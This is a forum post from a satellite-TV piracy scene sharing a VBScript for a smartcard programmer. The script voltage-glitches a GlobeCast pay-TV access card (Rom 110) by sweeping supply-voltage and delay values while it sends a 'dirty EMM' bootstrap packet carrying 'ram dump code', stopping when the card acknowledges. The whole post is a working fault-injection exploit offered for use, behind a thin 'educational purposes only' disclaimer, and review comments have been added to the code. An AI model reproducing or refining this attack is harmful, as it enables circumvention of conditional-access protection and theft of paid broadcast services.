Old 18th June 2008, 10:57 PM
50CENT1 50CENT1 is online now
Post SCRIPT 110 ROM(GlobeCast)

' New VB Script File - Created 05/02/2006
'
' Script Test Glitch Rom 110. Based on the original used for Rom 102; thanks to the original authors.
'
' Code Based on original from Lynard used at Rom 102.
'
' Don't Dump Any Byte , ONLY PURPOSES EDUCATIONAL .
'
' Notes:
' This Script REQUIRES ND13 and it will check for it!!!
'
' Good Luck and no LOOPING cards!!!
'
' Developed by Zyxel
'
'
Option Explicit

' Runs at load time, before Main: applies the serial/reset settings on the host's Wx object.
Call SetupUnlocker()

' Script-level state used by Main. Option Explicit makes every name below mandatory to declare.

' First packet sent to the card, its length in bytes, expected response length, acknowledge byte
Dim BootStrapCmd17, BSCLen, BSCRSP, BSACK

' Second packet (the one sent with glitch parameters), its length in bytes, expected response length
Dim CmdToGlitch, CTGLen, CTGRSP

' Scratch values: checksum string and response bytes/counters
Dim CS, Bytes, BytesRead, Bytes1, Bytes2

' Sweep bounds and current values for the glitch delay and glitch VCC, plus the glitch type code
Dim DelayStart, DelayLimit, VCCStart, VCCLimit, GlitchType, Delay, VCC

' Progress counter, first reset-response byte, and iteration counter used to clear the output window
Dim Dot, ATRrsp, loopctr

Sub Main()
' Entry point. Verifies the programmer firmware, builds two checksummed packets, then loops:
' reset the card, send the first packet, send the second packet together with a glitch
' delay / glitch type, and stop as soon as the first response byte equals &hAE.
' Between iterations the glitch VCC value is stepped down and, after each full VCC pass,
' the delay is advanced; both wrap, so the loop only ends on success or on a failed reset/response.
'
' NOTE(review): the search works only because the card's timing after the command is repeatable
' and a supply dip goes unnoticed. Card-side countermeasures that target exactly this are
' voltage/clock glitch detectors, randomised execution delays, and duplicated security checks.

clearoutputwindow
Sc.Verbose = False
loopctr = 0
' Refuse to run unless CheckChipVer reports the expected firmware identifier.
' NOTE(review): the header and message text say ND13 while the file named in the message is NewD12.hex.
if CheckChipVer <> 1 then
Sc.MsgBox("You need chip version ND13 to run this script" & VbCr & "Flash your Atmel chip with NewD12.hex")
Exit Sub
End if

' Sweep bounds. VCC counts down from VCCStart towards VCCLimit; Delay counts up from DelayStart.
DelayStart = &h2E0
DelayLimit = &h330
VCCStart = &h25
VCCLimit = &h05
GlitchType = 9
Sc.Verbose = 1 'Turn echo on - False = turns it off

'-----------------------------------------------------------------------------------------------------------------------

' First packet, as a hex string. The embedded spaces are ignored: GetPacketLen and DoCheckSum both strip them.
BootStrapCmd17="21406DA0CA000067046541018600AA9D9D 9D9D9D9D9D9D9D9D9D9D9BA6AEAD294AAD1A26FB9D9D9D9D9D 9D9D9D9D9D9D9D9D9D9D9D9D9D9D9D9D9DAD0EB740A6F04A26 FDB640819D9DB7404FADF3AE0A431100ADE820001000ADE298 25041100200410002000ADD5485A26F010008102"

'--------------------------------------------------------------------------------------
BSCRSP = 8 'Expected Response = 12 00 04 84 00 90 00 02
'Length = 8 bytes
' NOTE(review): BSACK is assigned here but the success test further down compares against the literal &hAE.
BSACK = &HAE 'Boot Strap running Acknowledge byte
'************************************************* *************************
CmdToGlitch = "21 00 08 A0 CA 00 00 02 15 00 86"
CTGRSP = &h01 'Length in bytes of expected response
'************************************************* *************************

' GetPacketLen returns a count of hex digits; an odd count means a half byte, so the packet is rejected.
BSCLen = GetPacketLen(BootStrapCmd17)

if (BSCLen AND 1) = 1 then
Sc.MsgBox("Bad BootStrapCmd17 packet")
sc.print BSCLen
Exit Sub
End if

' Convert the digit count to a byte count.
BSCLen = BSCLen / 2
BSCLen = BSCLen + 1 'add Checksum byte to packet length

CTGLen = GetPacketLen(CmdToGlitch)

if (CTGLen AND 1) = 1 then
Sc.MsgBox("Bad CmdToGlitch packet")
Exit Sub
End if

CTGLen = CTGLen / 2
CTGLen = CTGLen + 1 'add Checksum byte to packet length

' DoCheckSum returns a hex string, so "+" here is string concatenation.
CS=DoCheckSum (BootStrapCmd17) 'Calculates BootStrapCmd17 Checksum
BootStrapCmd17 = BootStrapCmd17 + CS 'add checksum to packet

CS=DoCheckSum (CmdToGlitch) 'Calculates packet Checksum
CmdToGlitch = CmdToGlitch + CS 'add checksum to packet

Delay = DelayStart
VCC = VCCStart
Sc.Print "Searching...." & VbCr
Dot = 0 'Dot progress counter if Sc.Verbose = False

' Outer loop: one attempt per (VCC, Delay) pair.
Do
' Inner loop: reset the card and accept it only if the second returned byte is &h1B.
' One retry is made; a second failure ends the script.
Do
Sc.Write("A2")
Sc.Write("B0" & HexString(VCC, 2)) 'set glitch VCC

Sc.Write("06 10 01 03 50 1A 00") 'reset card
Sc.Read(02)

ATRrsp = Sc.Getbyte(1)
if ATRrsp = &h1B then 'check card reset ok
Sc.Read(ATRrsp)
Exit Do
else
print VbCr & "NO ATR Rcv'd, trying 2nd ATR...." & VbCr
sc.delay(100)
Sc.Write("B0" & HexString(VCC, 2)) 'set glitch VCC
Sc.Write("06 10 01 03 50 1A 00") 'reset card
Sc.Read(02)
ATRrsp = Sc.Getbyte(1)
if ATRrsp = &h1B then 'check card reset ok
Sc.Read(ATRrsp)
Exit Do
else
print VbCr & "NO 2nd ATR Rcv'd, exiting script...." & VbCr
exit sub
end if
End if
loop

Sc.Write("02 15 00") 'set Tx/Rx to 32 cycles per bit
Sc.Read(02)

'Send dirty EMM (Cmd04) with our ram dump code
Sc.Write(HexString((BSCLen + 5), 2) & "60" & HexString((BSCLen - 1), 2) & BootStrapCmd17 & "50" & HexString((BSCRSP - 1), 2) & "00")
Sc.Read(2)

' Only bytes 0 and 5 of the response are checked (&h12 and &h90); the rest is not compared.
' NOTE(review): the expected-response comment below differs from the one next to BSCRSP above.
Bytes = Sc.Getbyte(1)
if Bytes > 0 then
Bytes = Sc.Read(Bytes)
Bytes1 = Sc.Getbyte(0)
Bytes2 = Sc.Getbyte(5)
'--------check response to make sure = 12 00 04 97 00 90 00 11--------
if Bytes1 = &h12 and Bytes2 = &h90 then
sc.verbose = false
else
print VbCr & "Bad CMD04 response...exiting sub..." & VbCr
exit sub
end if
else
print VbCr & "Bad CMD04 response...exiting sub..." & VbCr
exit sub
End if
'loader glitch packet

' Log the parameters of this attempt, then send the second packet with Delay and GlitchType appended.
Sc.Print "VCC = "& HexString(VCC, 2) & " (~" & ((5/255) * VCC) &" vdc)" & VbCr
Sc.Print "Glitch Delay = "& HexString(Delay, 4) & VbCr
Sc.Print "Glitch type " & HexString(GlitchType, 2) & VbCr
Sc.Print "===========================================" & VbCr
Sc.Write(HexString((CTGLen + 10), 2) & "1F 60" & HexString((CTGLen - 1), 2) & CmdToGlitch & "20" & HexString(Delay, 4) & HexString(GlitchType, 2) & "50" & HexString((CTGRSP - 1), 2) & "00")

Sc.Read(2)
BytesRead = Sc.Getbyte(1)
if BytesRead > 0 then
sc.verbose = true
Bytes = Sc.Read(BytesRead)
sc.verbose = false
Bytes1 = Sc.getbyte(0)
' Bytes2 is captured here but not read again in the visible code.
if BytesRead > 1 then
Bytes2 = Sc.getbyte(1)
end if
' Success condition: first response byte equals &hAE (the value also stored in BSACK).
if Bytes1 = &hAE then '
sc.verbose = true
Sc.Write("A1")
Sc.Print VbCr
Sc.Print "===========================================" & VbCr
Sc.Print "Glitch Success!!" & VbCr
Sc.Print "BootLoader Ack Received!!" & VbCr
Sc.Print "VCC = "& HexString(VCC, 2) & " (~" & ((5/255) * VCC) &" vdc)" & VbCr
Sc.Print "Glitch Delay = "& HexString(Delay, 4) & VbCr
Sc.Print "Glitch type " & HexString(GlitchType, 2) & VbCr
Sc.Print "===========================================" & VbCr
Exit Sub

else
print VbCr & "ACK not received yet......continuing...." & VbCr
end if
else
print VbCr & "No CMD15 bytes received....continuing...." & VbCr
End if

' Step to the next parameter pair: VCC down by one each attempt.
VCC = VCC - 1

' When VCC reaches VCCLimit it restarts at VCCStart and Delay advances by .1.
if VCC = VCCLimit then
VCC = VCCStart
Delay = Delay + .1
end if
' Delay wraps back to DelayStart once it exceeds DelayLimit, so the search never ends on its own.
if Delay > DelayLimit then
Delay = DelayStart

end if


' Clear the output window every 100 attempts.
loopctr = loopctr +1
if loopctr = 100 then
clearoutputwindow
loopctr = 0
end if


loop

End Sub

Function GetPacketLen (Packet)
' Returns how many characters remain in Packet once every space has been dropped.
' For a hex-string packet this is the number of hex digits, not the number of bytes.
Dim Stripped

Stripped = Replace(Packet, " ", "") 'drop the separators between byte pairs

GetPacketLen = Len(Stripped)

End Function


Function DoCheckSum (Packet)
' Computes the XOR of every byte in a hex-string packet and returns it as a hex
' string padded to at least two digits. Spaces in Packet are ignored. If the digit
' count is odd, the final lone digit is folded in as a value of its own.
Dim Digits
Dim Running
Dim Pos

Digits = Replace(Packet, " ", "") 'work on the digits only

Running = 0

'walk the string one byte (two hex digits) at a time
For Pos = 1 To Len(Digits) Step 2
Running = Running XOR Hex2Dec(Mid(Digits, Pos, 2))
Next

DoCheckSum = HexString(Running, 2)

End Function

Function Hex2Dec(HexNumber)
' Converts a string of hex digits (any length, upper or lower case, spaces allowed)
' to its numeric value. The argument is normalised in place: it is upper-cased and
' its spaces are removed. Nothing is assigned for an empty string, so the result
' is then the uninitialised (Empty) value.
Dim Total
Dim Pos
Dim Ch
Dim Weight
Dim NibbleValue

HexNumber = Replace(UCase(HexNumber), " ", "")
Total = Len(HexNumber)

For Pos = 1 To Total

Ch = Mid(HexNumber, Pos, 1)
Weight = 16 ^ (Total - Pos) 'place value of this digit
If Asc(Ch) >= 58 Then
NibbleValue = Asc(Ch) - 55 '"A" (65) maps to 10
Else
NibbleValue = Ch 'character codes below 58 are used as the digit itself
End If
Hex2Dec = Hex2Dec + NibbleValue * Weight
Next

End Function

Function HexString(Number,Length)
' Formats Number as upper-case hexadecimal, left-padded with "0" up to Length digits.
' A value that needs more than Length digits is returned in full, not truncated.
Dim Digits
Dim Missing
Digits=Hex(Number)
Missing=Length-Len(Digits)
If Missing>0 Then
HexString=String(Missing,"0") & Digits
Else
HexString=Digits
End If
End Function

Function CheckChipVer()
' Returns 1 when the device answers the "90" request with exactly four bytes
' equal to 4E 44 31 33 (ASCII "ND13"), otherwise 0.
' Main uses the result to refuse to run against any other programmer firmware.

' Assume a match; any failed comparison below clears the flag.
CheckChipVer = 1

' presumably "90" is the version query understood by the programmer firmware - confirm
sc.write("90")
sc.delay(80)

' A short read means no usable answer.
if sc.read(4) <> 4 then
CheckChipVer = 0
Exit Function
End if

' NOTE(review): getbyte is unqualified here while Main calls Sc.Getbyte - confirm the host exposes both.
if getbyte(0) <> &H4E then CheckChipVer = 0
if getbyte(1) <> &H44 then CheckChipVer = 0
if getbyte(2) <> &H31 then CheckChipVer = 0
if getbyte(3) <> &H33 then CheckChipVer = 0

End Function

' Prints a banner and assigns the serial, reset and logging options on the host's Wx object.
' Called once at script load, before Main. Declared as a Function, but no return value is
' assigned in the visible lines.
' NOTE(review): the listing in this post stops after Wx.DisplayFuse; no closing End Function is visible.
Function setupunlocker()
sc.print "________________Setting up WinExplorer_________________" & VbCr
Wx.BaudRate = 115200
Wx.ResetBaudRate = 115200
Wx.Parity = 0 ' 0 = None, 1 = Odd, 2 = Even, 3 = Mark, 4 = Space
Wx.StopBits = 0 ' 0 = 1 stop bit, 1 = 1.5 stop bits, 2 = 2 stop bits
Wx.DTRControl = 0 ' Initial state of DTR 0 = off, 1 = on
Wx.RTSControl = 1 ' Initial state of RTS 0 = off, 1 = on
Wx.ResetDelay = 100 ' In microseconds
Wx.ByteDelay = 10 ' In microseconds
Wx.RxByteTimeout = 500 ' In milliseconds
Wx.ResetMode = 2 ' 0 = No Resets, 1 = ISO Reset (Expect a ATR), 2 = Device Reset (No ATR)
Wx.ResetLine = 1 ' 0 = Toggle RTS for Reset, 1 = Toggle DTR for Reset
Wx.ByteConvention = 1 ' 0 = Inverse, 1 = Direct
Wx.FlushEchoByte = 0 ' 0 = no flush, 1 = flush - A Phoenix interface will echo each byte transmitted.
Wx.FlushBeforeWrite = 1 ' 0 = no flush, 1 = flush - Flush the receive buffer before each write to strip off Null bytes.
' With IgnoreTimeouts = 1 a receive timeout does not abort the script, so Main's own response checks are the only failure handling.
Wx.IgnoreTimeouts = 1 ' 0 = Abort script on a receive timeout, 1 = Ignore all receive timeouts
Wx.ResetAfterTimeout = 0 ' 0 = Don't reset after a timeout, 1 = do a reset after a timeout - Not used if "IgnoreTimeouts=0"
Wx.LogTransactions = 0 ' 0 = Don't log transactions, 1 = log transactions
Wx.DisplayUSW = 0 ' Display USW after script complete 0 = no, 1 = yes
Wx.DisplayFuse = 0 ' Display Fuse after script complete 0 = no, 1 = yes
__________________
thanks for watching my post.

50CENT1 sa postovanjem!!!
11.18.2008
GlobeCast N2-DOWN N3-DOWN
Total TV UP Videogouard , Pink Media Group UP Irdeto2 Biss Videogouard,SATOPIA AND ICON DOWN ON GLOBECAST WORLD TV
WARNING: Please note that watching Pay TV without a valid
subscription is illegal!! All files serve research purposes only!
I won't take responsibility !!!!!!